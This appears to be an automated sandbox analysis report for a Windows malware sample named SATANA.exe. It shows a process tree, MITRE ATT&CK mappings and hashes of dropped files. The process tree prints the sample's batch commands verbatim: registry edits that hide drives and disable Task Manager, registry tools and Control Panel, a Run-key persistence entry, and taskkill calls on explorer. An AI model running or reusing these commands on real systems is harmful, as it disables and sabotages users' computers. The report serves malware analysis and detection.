- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4656,i,5610788072648676284,17212228004455157563,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4848 /prefetch:8
  2⤵
  PID:5220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4852,i,5610788072648676284,17212228004455157563,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5608 /prefetch:8
  2⤵
  PID:4128
- C:\Users\Admin\Downloads\SATANA (1).exe
  "C:\Users\Admin\Downloads\SATANA (1).exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3416
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7FBA.tmp\7FBB.bat "C:\Users\Admin\Downloads\SATANA (1).exe""
    3⤵
    PID:996
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /f
      4⤵
      PID:1984
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
      4⤵
      PID:6024
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /f
      4⤵
      PID:3908
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /f
      4⤵
      PID:1628
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /f
      4⤵
      PID:5696
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /f
      4⤵
      PID:2260
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REG_DWORD /d 1 /f
      4⤵
      PID:4592
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
      4⤵
      PID:3960
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f
      4⤵
      PID:1672
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
      4⤵
      PID:2428
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f
      4⤵
      PID:3292
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f
      4⤵
      PID:4236
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f
      4⤵
      PID:3624
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartmenuLogoff /t REG_DWORD /d 1 /f
      4⤵
      PID:4688
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f
      4⤵
      PID:3680
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REG_DWORD /d 1 /f
      4⤵
      PID:1760
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f
      4⤵
      PID:1588
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /f
      4⤵
      PID:3868
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f
      4⤵
      PID:3644
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REG_DWORD /d 1 /f
      4⤵
      PID:4220
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
      4⤵
      PID:4176
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REG_DWORD /d 1 /f
      4⤵
      PID:396
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
      4⤵
      PID:828
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
      4⤵
      PID:1308
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
      4⤵
      PID:3532
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f
      4⤵
      PID:4488
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f
      4⤵
      PID:5108
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REG_DWORD /d 1 /f
      4⤵
      PID:4020
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f
      4⤵
      PID:4008
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
      4⤵
      PID:5620
  - - C:\Windows\system32\reg.exe
      reg add "hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f
      4⤵
      PID:2108
  - - C:\Windows\system32\rundll32.exe
      rundll32 user32, SwapMouseButton
      4⤵
      PID:3612
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disableregistrytools /t REG_DWORD /d 1 /f
      4⤵
      PID:2188
  - - C:\Windows\system32\taskkill.exe
      taskkill /IM explorer.exe /F
      4⤵
      Kills process with taskkill
      PID:2300
  - - C:\Windows\system32\taskkill.exe
      taskkill /IM taskmgr.exe /F
      4⤵
      Kills process with taskkill
      PID:1080
  - - C:\Windows\system32\taskkill.exe
      taskkill /IM notepad.exe /F
      4⤵
      Kills process with taskkill
      PID:2160
- C:\Users\Admin\Downloads\SATANA.exe
  "C:\Users\Admin\Downloads\SATANA.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4212
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\86DE.tmp\86DF.bat C:\Users\Admin\Downloads\SATANA.exe"
    3⤵
    PID:2032
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /f
      4⤵
      PID:4528
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
      4⤵
      PID:3896
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /f
      4⤵
      PID:220
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /f
      4⤵
      PID:4396
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /f
      4⤵
      PID:2928
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /f
      4⤵
      PID:4064
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REG_DWORD /d 1 /f
      4⤵
      PID:4404
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
      4⤵
      PID:4268
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f
      4⤵
      PID:3484
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
      4⤵
      PID:3652
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f
      4⤵
      PID:3444
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f
      4⤵
      PID:3732
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f
      4⤵
      PID:3156
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartmenuLogoff /t REG_DWORD /d 1 /f
      4⤵
      PID:5096
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f
      4⤵
      PID:3128
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REG_DWORD /d 1 /f
      4⤵
      PID:3968
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f
      4⤵
      PID:3204
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /f
      4⤵
      PID:4736
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f
      4⤵
      PID:2408
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REG_DWORD /d 1 /f
      4⤵
      PID:1836
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
      4⤵
      PID:2824
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REG_DWORD /d 1 /f
      4⤵
      PID:1560
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
      4⤵
      PID:2272
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
      4⤵
      PID:3772
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
      4⤵
      PID:2776
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f
      4⤵
      PID:1220
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f
      4⤵
      PID:5804
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REG_DWORD /d 1 /f
      4⤵
      PID:5236
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f
      4⤵
      PID:5180
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
      4⤵
      PID:3992
  - - C:\Windows\system32\reg.exe
      reg add "hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f
      4⤵
      PID:4944
  - - C:\Windows\system32\rundll32.exe
      rundll32 user32, SwapMouseButton
      4⤵
      PID:5024
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disableregistrytools /t REG_DWORD /d 1 /f
      4⤵
      PID:3620
  - - C:\Windows\system32\taskkill.exe
      taskkill /IM explorer.exe /F
      4⤵
      Kills process with taskkill
      PID:5028
  - - C:\Windows\system32\taskkill.exe
      taskkill /IM taskmgr.exe /F
      4⤵
      Kills process with taskkill
      PID:5424
  - - C:\Windows\system32\taskkill.exe
      taskkill /IM notepad.exe /F
      4⤵
      Kills process with taskkill
      PID:4928

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:6020

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5080 -ip 5080
1⤵
PID:2272

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
4bdedb2335b5806343ae3639d5466479

SHA1
23cf02ec116d0faf74d79bff0c5aa86365b1d02c

SHA256
48f45d7781ca28bff1a11b6cf4e8da887de532f9d62f33e39a2588a6c337980b

SHA512
b19dd0e51f66b7d01d2cc4f6c5b49ea5157d8b50b6cdf8b0278ce8ff35696526e9e079761b4357e10b987d34fb7b61e319b915994d7bbef5dc496c376f6e5fef

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
2b2c9866c25d6b1c24226a9d8cec4766

SHA1
e3ca88054e978bf56c20c23c1619320abc5b2b86

SHA256
566996168b7365b105aa813c2516b89e127934f3a57bb1d185a8f88cec4e53eb

SHA512
f983774a405814511efd9a132da586e792fb6e75b394f5007f975e35d80d64004029803750b79e6f45c758919481b5349ce767aa3ec89b6b106a13571b37a4cd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
766d9965daba12182e1570242fc24e6e

SHA1
8729f3517ca819936819a1235f32da501b5662b9

SHA256
7ea78d8d85c17bf34274ff7a974c8eb6aa3ac394a7546299269ff939e31074e6

SHA512
090818e50f71d0e255082e7cc406352644c452f54b5d51191985a32185453dd65b53b4c61b7a189c01694a2ebfb93ee650b3358032698b657f509796ddc1f882

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
eeb6ccf83dce7209b03f22cb019ca42e

SHA1
42ea81b9aa3385efecf2c3f3986375d8616c0e7c

SHA256
423b2352c3684ab16566a9642214903a082c41470f360a0e29ee79c195be31ef

SHA512
35c4a6cb8a79260e76f2d8284a7a3ed1f68c6ab8923c0e8374af5a0e36a26b05f321e1a3869e5aecaa6856ab0e84d4d0c8cf43011efbd1788f1c882960f6613f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
b05faf06030141d3fefe1df99b48fb4a

SHA1
7fe9be0e9586fbff75b0cec1b83e4ae9df9df852

SHA256
36a71bf90865ca6435e73a4fe1a35effd251a836ee635710bf5d62abd86ab5b9

SHA512
346997ff9b83b068d8b693f94f5077449d9f665706a08e4beff464174402f90a93c1a36ceb0c638a60e62d1b57dcb12b250108ebe4a02952d9c42c2b59bc8269

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
fbad0e2a9cd797026ebb7207ee16a08c

SHA1
29e284ea564f37fdfa317661fad1efcf5058ae8d

SHA256
5432df1b3b4028b0f521b68fb0e001257c6fcc2363085fc7dd08697e5ec52558

SHA512
0bd3ffd8668669a89392212f1da636cfea84dbd8f25e6a30b647c651e8274a2a02bfd6db4c72731d8e5257089feed21db54e98741c83642fc051e20f59452350

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
cf87d164eb02200b90009f0426b827d1

SHA1
2a5e4371b464a864ca1f7041657be0f422160996

SHA256
b9836857757b0e596d840594cf2846ec888ec302920f6f4755a4a24a26fd41a0

SHA512
d8cccfaf7140f4ce9f264bf9458232327ff3d514813f2f6d9e07a12bd0b947d95c635cd1f6222b125c77a96a624806577ebe0415305e162842c3889c59b90b2b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
9c92092692862009482cbc7650eb5f79

SHA1
753708192c8674665ec852f9d3b41d186bbe437f

SHA256
74b5b3de7ba4dcf265372572e395b2d2aae00f4e9121f1cec191ca07015b56da

SHA512
ec69816e602ab305b3518939dbfcbc4dfa4c00583977c13612b08892767cf8f6f7832a47259c1f8b48c8867ce38df6c029b04c3883a31d5c2464337dc07b239b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
abd3dcc665f90d62490d3bd696131750

SHA1
78cafdc67151872b2ab905f6792c69dc93365433

SHA256
61e18ca1c374889351dd2bb4d622b737e58d4c21b22a69e5c5902b3ea6e7dab2

SHA512
791c6c00fbbce0d4fffb7195d4bccccd5b27e05fb5a2ffd12d5e0bc1be8861e1bb3d9d9a2c172b4fc647dedf2cbb731067d879feabce34020df8b99e5d8ca4ab

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
59367a4c6a470aa0c885633c2f5e4225

SHA1
2ac1031fe6527f5e8b6b90712de4c511964928ff

SHA256
dcb6f72ab506d98847648b537c0018b5301fe590ae4b2a7b65af1bf6b2ebab98

SHA512
45dece94db93690fe185b950fe1404b8101b1f587e6398f344c276266ec88cc3bb2c9e8be0aaa7580c00b11dee24caab667d27f4121dc70cb778d5efeef6301a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
123KB

MD5
cfb9cf178bab733450079cb10e16ea08

SHA1
572e862b43331ce9ebc5327365ee745f412343d6

SHA256
129d3f5f94edf507eec7a1f7d3fa4d59f71a99fd5783d9dae9520e0179e0820e

SHA512
a0aca667a8ee10addd5c56fa07e5d7198a10903b30940c968facd8fd30ce54eb9205b4c062171020ce7b97539556b0a5e8ae4b09141d54f82a728b4e5a00b48d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
123KB

MD5
f2697cdc998642edd77b6f9d7fb3ba40

SHA1
44cbe1ccd1629b406ec3790539a61fa36fcc1b98

SHA256
ece22dfc9d6d30af1c036f9f42af12465113d8b3af6234833a09304695c264df

SHA512
54fb9ce284b8d5e78df61a8332939514b1020ce751fae57f650766c5306554603592536b61cbbd4ed5d1df1d7c8a9d1fe9d572eca384f659e4b223d53699f63d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
123KB

MD5
3a083237ff97c0c9f7b744cac7718b69

SHA1
bfcd0b2016b6efcee38a33cce7eaeafe32baff00

SHA256
dbe4f89d507c5ec33e86ad8291fa89218bbf64d6194eb9dff55abbe519902a96

SHA512
40b26d352e1303f4f76cbae941f2dbee2cd9cdb2a67712be148622c457ab8cbae394d581a2a7362ec7e92adc5273f48d0a94809e1e08dc1bcb1ab59804bbae67

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

Filesize
264KB

MD5
4bee2d7683c379097397e402ba7ff717

SHA1
929f0b229150a1913a153d37e8a58f761296e3dc

SHA256
c26aadd99c7d6886e0c8f2e807133fb72a2277c30d1c1113206a31bd4736d6c6

SHA512
7204b661272a6f3614bfae919bce94659884e7814ce0cd96d43562e827da476719516e669934fc3d3d4d4726476001f6f8e29c63cb0e2ac0aa4c45fadeaf6271

Download Submit
C:\Users\Admin\AppData\Local\Temp\1354.tmp\1355.bat

Filesize
4KB

MD5
1f7a5456ca38839ec9e112425e7fa747

SHA1
8019978db5a80de11bb32463aa7160bb4a4d6b8a

SHA256
f955addebe88273b07cd9db9484f6aaaff58bec7f06898f8cdf224fa8b9cecb6

SHA512
eb57e75f96b7c663af44015e4dca2d6d07d9fed0db609bb6bad790093d0cef69e30ea6bb31093dd505af82a873c7a12f4bfcebe6f68938728d30053fff7c0818

Download Submit
C:\Users\Admin\AppData\Local\Temp\1354.tmp\2.exe

Filesize
150KB

MD5
4bc20c24fbea4588741203c77126c7b3

SHA1
5f2d2fec4e1d7c752be551363743069d9a4e7510

SHA256
4cd2ce15d0752711a76118fba8046193a1847c85a3278410191c0a015b387be3

SHA512
3e508012250ad6115e49b059a7fc103274190be425403df7081aa3e4caf130b9fa685c3228cafb6a031c121acdd95d72c1f5180f42caea55213a7bd9de71b31f

Download Submit
C:\Users\Admin\Downloads\SATANA.exe

Filesize
106KB

MD5
e98af5555d9174b86254a186db60ba82

SHA1
cc6faef9e23a4ef9f4c4337fffc17c80c9ce2135

SHA256
2207f4926319896f1d5b1bf2acd6d0cda56dbc47131b5fd21a7d726ba6dfaa2d

SHA512
8eb26885c9699d9edb891df112e444d4a1758711ad02aa891f9483a608875b7819679ab826fa52cf803b372c6f05df6c82180775fa1bb6ca0d62acfa0020eeff

Download Submit
memory/2772-219-0x0000000000400000-0x0000000000443000-memory.dmp

Filesize
268KB

Download
memory/2772-263-0x0000000000400000-0x0000000000443000-memory.dmp

Filesize
268KB

Download
memory/2772-244-0x0000000000400000-0x0000000000443000-memory.dmp

Filesize
268KB

Download
memory/5080-282-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads